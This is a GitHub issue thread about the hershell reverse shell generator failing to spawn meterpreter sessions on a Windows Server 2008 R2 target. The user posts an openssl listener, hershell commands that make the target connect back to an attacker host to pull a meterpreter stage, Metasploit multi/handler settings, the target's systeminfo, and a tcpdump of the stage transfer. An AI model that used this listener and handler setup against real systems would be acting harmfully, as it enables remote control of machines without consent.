lesnuages / hershell

Multiplatform reverse shell generator
BSD 3-Clause "New" or "Revised" License
581 stars 97 forks

SSL Error when spawning meterpreter #3

Open pwn-star opened 5 years ago

pwn-star commented 5 years ago

I'm receiving the same error/issue as seen here using the latest release: https://github.com/sysdream/hershell/issues/2

openssl s_server -cert server.pem -key server.key -accept 8083
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQg+FcZskUtPAldc5nOTKfLTeWs13giztsD+3wEZ2Mc4eIE
MDH+Q2f/9GhZ8kQRm8ZkND4pvUYWwvqnczUxcNFEtzr9yLAN1Hn7WvOHkY6WJ2ls
NaEGAgRdLBSvogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Groups: X25519:P-256:P-384:P-521
Shared Elliptic groups: X25519:P-256:P-384:P-521
No server certificate CA names sent
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter tcp 192.168.71.120:8080
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED

Module advanced options (exploit/multi/handler):

   Name                    Current Setting  Required  Description
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           false            yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 true             no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   AutoLoadStdapi               false            yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               false            yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySession            false            yes       Automatically verify and drop invalid sessions
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert               server.pem       no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      true             no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

pwn-star commented 5 years ago

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.71.120   yes       The listen address (an interface may be specified)
   LPORT     8080             yes       The listen port

Exploit target:

   Id  Name
   0   Wildcard Target

pwn-star commented 5 years ago

[*] Sending stage (179779 bytes) to 192.168.71.98
[*] 192.168.71.98 - Meterpreter session 23 closed. Reason: Died
[*] Meterpreter session 23 opened (127.0.0.1 -> 192.168.71.98:52445) at 2019-07-15 02:12:12 -0400

sessions -l shows no new meterpreter shells

lesnuages commented 5 years ago

Could you please provide some info about the following elements, so I can address this faster:

Thanks

lesnuages commented 5 years ago

@pwn-star it should be fixed in 4497a20. Let me know if that's not the case.

pwn-star commented 5 years ago

Thanks for the response! I tested both 32 and 64 bit. Here's the system info; I'll test right now to see if 4497a20 resolves the issue.

C:\Program Files\Windows NT\Accessories>systeminfo
systeminfo

Host Name:                 xxxxxxxxxxx
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                xxxxxxxxxxxx
Original Install Date:     8/7/2014, 9:38:31 PM
System Boot Time:          7/5/2019, 10:51:15 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           01: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1696 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 9/21/2015
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     10,240 MB
Available Physical Memory: 2,324 MB
Virtual Memory: Max Size:  20,477 MB
Virtual Memory: Available: 12,445 MB
Virtual Memory: In Use:    8,032 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    xxxxxx
Logon Server:              N/A
Hotfix(s):                 475 Hotfix(s) Installed.


Network Card(s):           1 NIC(s) Installed.
                           01: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)

pwn-star commented 5 years ago

Same error happens with both 32 and 64 bit payloads, using meterpreter x64 and 386 reverse_tcp payloads.

pwn-star commented 5 years ago

Module advanced options (exploit/multi/handler):

   Name                    Current Setting  Required  Description
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           true             yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 true             no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySession            true             yes       Automatically verify and drop invalid sessions
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert               ./server.pem     no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      true             no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

pwn-star commented 5 years ago

attempt with 32 bit http:

Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA512:ECDSA+SHA512
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Groups: X25519:P-256:P-384:P-521
Shared Elliptic groups: X25519:P-256:P-384:P-521
No server certificate CA names sent
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter http 192.168.71.120:8081
Get http://192.168.71.120:8081/pOYOONTTmsxX: net/http: HTTP/1.x transport connection broken: malformed HTTP status code "program"
[hershell]> meterpreter http 192.168.71.120:8081
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED

pwn-star commented 5 years ago

tcpdump -v -i eth0 'port 8081'
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
02:26:50.263836 IP (tos 0x0, ttl 128, id 30064, offset 0, flags [DF], proto TCP (6), length 52)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [S], cksum 0x249b (correct), seq 1019336057, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
02:26:50.263881 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 52)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [S.], cksum 0x1052 (incorrect -> 0xdb1d), seq 2368105014, ack 1019336058, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
02:26:50.264125 IP (tos 0x0, ttl 128, id 30065, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x8bff (correct), ack 1, win 513, length 0
02:26:50.303876 IP (tos 0x0, ttl 64, id 54307, offset 0, flags [DF], proto TCP (6), length 44)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x104a (incorrect -> 0x4751), seq 1:5, ack 1, win 229, length 4
02:26:50.305717 IP (tos 0x0, ttl 64, id 54308, offset 0, flags [DF], proto TCP (6), length 7340)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x2cca (incorrect -> 0x896b), seq 5:7305, ack 1, win 229, length 7300
02:26:50.305742 IP (tos 0x0, ttl 64, id 54313, offset 0, flags [DF], proto TCP (6), length 5880)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x2716 (incorrect -> 0xa2de), seq 7305:13145, ack 1, win 229, length 5840
02:26:50.306070 IP (tos 0x0, ttl 128, id 30066, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x58ad (correct), ack 13145, win 507, length 0
02:26:50.306096 IP (tos 0x0, ttl 64, id 54317, offset 0, flags [DF], proto TCP (6), length 14640)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x494e (incorrect -> 0x7354), seq 13145:27745, ack 1, win 229, length 14600
02:26:50.306113 IP (tos 0x0, ttl 64, id 54327, offset 0, flags [DF], proto TCP (6), length 14640)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x494e (incorrect -> 0xe08f), seq 27745:42345, ack 1, win 229, length 14600
02:26:50.306237 IP (tos 0x0, ttl 128, id 30067, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x47a2 (correct), ack 17525, win 490, length 0
02:26:50.306258 IP (tos 0x0, ttl 64, id 54337, offset 0, flags [DF], proto TCP (6), length 8800)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x327e (incorrect -> 0x6363), seq 42345:51105, ack 1, win 229, length 8760
02:26:50.306272 IP (tos 0x0, ttl 128, id 30068, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3697 (correct), ack 21905, win 473, length 0
02:26:50.306282 IP (tos 0x0, ttl 64, id 54343, offset 0, flags [DF], proto TCP (6), length 8800)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x327e (incorrect -> 0x0a87), seq 51105:59865, ack 1, win 229, length 8760
02:26:50.306312 IP (tos 0x0, ttl 128, id 30069, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1fde (correct), ack 27745, win 450, length 0
02:26:50.306346 IP (tos 0x0, ttl 128, id 30070, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1fd0 (correct), ack 27745, win 464, length 0
02:26:50.306396 IP (tos 0x0, ttl 128, id 30071, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x1f9f (correct), ack 27745, win 513, length 0
02:26:50.306410 IP (tos 0x0, ttl 128, id 30072, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd88 (correct), ack 36505, win 479, length 0
02:26:50.306421 IP (tos 0x0, ttl 64, id 54349, offset 0, flags [DF], proto TCP (6), length 26320)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x76ee (incorrect -> 0x5889), seq 59865:86145, ack 1, win 229, length 26280
02:26:50.306448 IP (tos 0x0, ttl 128, id 30073, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd7b (correct), ack 36505, win 492, length 0
02:26:50.306471 IP (tos 0x0, ttl 128, id 30074, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xfd66 (correct), ack 36505, win 513, length 0
02:26:50.306522 IP (tos 0x0, ttl 128, id 30075, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xca18 (correct), ack 49645, win 507, length 0
02:26:50.306540 IP (tos 0x0, ttl 64, id 54367, offset 0, flags [DF], proto TCP (6), length 12204)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x3fca (incorrect -> 0x8f67), seq 86145:98309, ack 1, win 229, length 12164
02:26:50.306554 IP (tos 0x0, ttl 128, id 30076, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xca12 (correct), ack 49645, win 513, length 0
02:26:50.306629 IP (tos 0x0, ttl 128, id 30077, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xa226 (correct), ack 59865, win 513, length 0
02:26:50.306658 IP (tos 0x0, ttl 64, id 54376, offset 0, flags [DF], proto TCP (6), length 32160)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x8dbe (incorrect -> 0x193c), seq 98309:130429, ack 1, win 229, length 32120
02:26:50.306680 IP (tos 0x0, ttl 128, id 30078, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x8010 (correct), ack 68625, win 479, length 0
02:26:50.306725 IP (tos 0x0, ttl 128, id 30079, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x6957 (correct), ack 74465, win 456, length 0
02:26:50.306764 IP (tos 0x0, ttl 128, id 30080, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x584c (correct), ack 78845, win 439, length 0
02:26:50.306816 IP (tos 0x0, ttl 64, id 54398, offset 0, flags [DF], proto TCP (6), length 32160)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x8dbe (incorrect -> 0xf1b5), seq 130429:162549, ack 1, win 229, length 32120
02:26:50.306840 IP (tos 0x0, ttl 128, id 30081, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x4193 (correct), ack 84685, win 416, length 0
02:26:50.306854 IP (tos 0x0, ttl 128, id 30082, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3088 (correct), ack 89065, win 399, length 0
02:26:50.306918 IP (tos 0x0, ttl 128, id 30083, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x19c2 (correct), ack 94905, win 389, length 0
02:26:50.306954 IP (tos 0x0, ttl 128, id 30084, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x194c (correct), ack 94905, win 507, length 0
02:26:50.306987 IP (tos 0x0, ttl 128, id 30085, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x00b1 (correct), ack 101229, win 482, length 0
02:26:50.307003 IP (tos 0x0, ttl 128, id 30086, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x00a3 (correct), ack 101229, win 496, length 0
02:26:50.307027 IP (tos 0x0, ttl 128, id 30087, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0092 (correct), ack 101229, win 513, length 0
02:26:50.307062 IP (tos 0x0, ttl 64, id 54420, offset 0, flags [DF], proto TCP (6), length 16100)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x4f02 (incorrect -> 0xf019), seq 162549:178609, ack 1, win 229, length 16060
02:26:50.307069 IP (tos 0x0, ttl 64, id 54431, offset 0, flags [DF], proto TCP (6), length 1215)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x14dd (incorrect -> 0x50b3), seq 178609:179784, ack 1, win 229, length 1175
02:26:50.307089 IP (tos 0x0, ttl 128, id 30088, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xd2f1 (correct), ack 112909, win 513, length 0
02:26:50.307143 IP (tos 0x0, ttl 128, id 30089, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xb67e (correct), ack 120209, win 496, length 0
02:26:50.307201 IP (tos 0x0, ttl 128, id 30090, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x9469 (correct), ack 128969, win 461, length 0
02:26:50.307248 IP (tos 0x0, ttl 128, id 30091, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x835e (correct), ack 133349, win 444, length 0
02:26:50.307296 IP (tos 0x0, ttl 128, id 30092, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x6ca4 (correct), ack 139189, win 422, length 0
02:26:50.307346 IP (tos 0x0, ttl 128, id 30093, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x55eb (correct), ack 145029, win 399, length 0
02:26:50.307398 IP (tos 0x0, ttl 128, id 30094, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3f32 (correct), ack 150869, win 376, length 0
02:26:50.307423 IP (tos 0x0, ttl 128, id 30095, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3f25 (correct), ack 150869, win 389, length 0
02:26:50.307442 IP (tos 0x0, ttl 128, id 30096, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x3ea9 (correct), ack 150869, win 513, length 0
02:26:50.307522 IP (tos 0x0, ttl 128, id 30097, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0b61 (correct), ack 164009, win 501, length 0
02:26:50.307546 IP (tos 0x0, ttl 128, id 30098, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0x0b55 (correct), ack 164009, win 513, length 0
02:26:50.307627 IP (tos 0x0, ttl 128, id 30099, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xe368 (correct), ack 174229, win 513, length 0
02:26:50.307699 IP (tos 0x0, ttl 128, id 30100, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [.], cksum 0xcdb5 (correct), ack 179784, win 513, length 0
02:26:50.309708 IP (tos 0x0, ttl 128, id 30101, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [F.], cksum 0xcdb4 (correct), seq 1, ack 179784, win 513, length 0
02:26:50.312120 IP (tos 0x0, ttl 64, id 54432, offset 0, flags [DF], proto TCP (6), length 40)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [.], cksum 0x1046 (incorrect -> 0xced0), ack 2, win 229, length 0
02:26:50.641058 IP (tos 0x0, ttl 64, id 54433, offset 0, flags [DF], proto TCP (6), length 611)
    192.168.71.120.tproxy > targetserver.xxx.corp.59517: Flags [P.], cksum 0x1281 (incorrect -> 0x9b15), seq 179784:180355, ack 2, win 229, length 571
02:26:50.641341 IP (tos 0x0, ttl 128, id 30106, offset 0, flags [DF], proto TCP (6), length 40)
    targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [R.], cksum 0xcd76 (correct), seq 2, ack 180355, win 0, length 0

lesnuages commented 5 years ago

Gotta get my hands on a Windows Server 2008 R2 iso before going further, the issue seems to be OS specific.